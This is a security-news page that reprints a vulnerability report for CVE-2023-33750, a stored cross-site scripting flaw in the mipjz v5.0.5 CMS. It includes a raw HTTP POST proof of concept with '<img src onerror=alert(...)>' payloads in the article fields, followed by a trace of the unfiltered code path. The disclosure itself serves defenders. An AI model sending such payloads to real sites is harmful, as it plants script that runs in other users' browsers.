Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2023-33750: There is a cross site scripting (XSS) vulnerability exists in mipjz v5.0.5 · Issue #15 · sansanyun/mipjz

A stored cross-site scripting (XSS) vulnerability in mipjz v5.0.5 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Description parameter at /index.php?s=/article/ApiAdminArticle/itemAdd.

CVE
Open in Source
#xss#csrf#vulnerability#web#windows#js#git#php#firefox

[Vulnerability Description]
Cross SIte Scripting (XSS) vulnerability exists in mipjz v5.0.5, attackers can execute arbitrary code via the article description field from /article/ApiAdminArticle/itemAdd.

[Vulnerability Type]
Cross Site Scripting (XSS)

[Vendor of Product]
https://github.com/sansanyun/mipjz
http://www.mipjz.com/

[Affected Product Code Base]
v5.0.5

[Vulnerability Proof]

  1. Add an article, insert js code in the description parameter: xss

    POST /index.php?s=/article/ApiAdminArticle/itemAdd HTTP/1.1 Host: 192.168.11.102 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/113.0 Accept: application/json, text/plain, / Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Content-Type: application/json;charset=utf-8 dataId: Content-Length: 426 Origin: http://192.168.11.102 Connection: close Referer: http://192.168.11.102/index.php?s=/admin/ Cookie: csrf_49dccd=65bc5ef8; Hm_lvt_3155433929be1afd6cef849b9709d4d7=1684330392; Hm_lpvt_3155433929be1afd6cef849b9709d4d7=1684330392; PHPSESSID=rtdn09cuqpvt4chfomi043aun0

    {"title":"xss","keywords":"123","description":"xss<img src onerror=alert(22)>","link_tags":"","url_name":"","content":"<p>123<br></p>","is_recommend":"0","tags":"xss<img src onerror=alert(1)>","publish_time":"","fieldList":"[{"value":"","key":"diy_aaa","name":"<img src onerror=alert(1)>"}]","img_url":"/public/uploads/temp/2023/05/17/6464f65ca6526.jpg"}

  1. Visit the article page, the code is loaded and executed

[Code Details]

  1. Add an article, receive parameters, and pass it to \app\article\model\Articles.php:itemAdd for processing

  2. \app\article\model\Articles.php:itemAdd does not check and filter the description, and directly stores it in the database

  3. Article Details \app\article\controller\ArticleDetail.php:index takes out the article description in the database and passes it to $mipDescription without filtering

  4. In the “guess you like” area in the article display \template\default\article\articleDetail.html, directly output the $mipDescription in the previous step, causing the malicious code to be executed

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE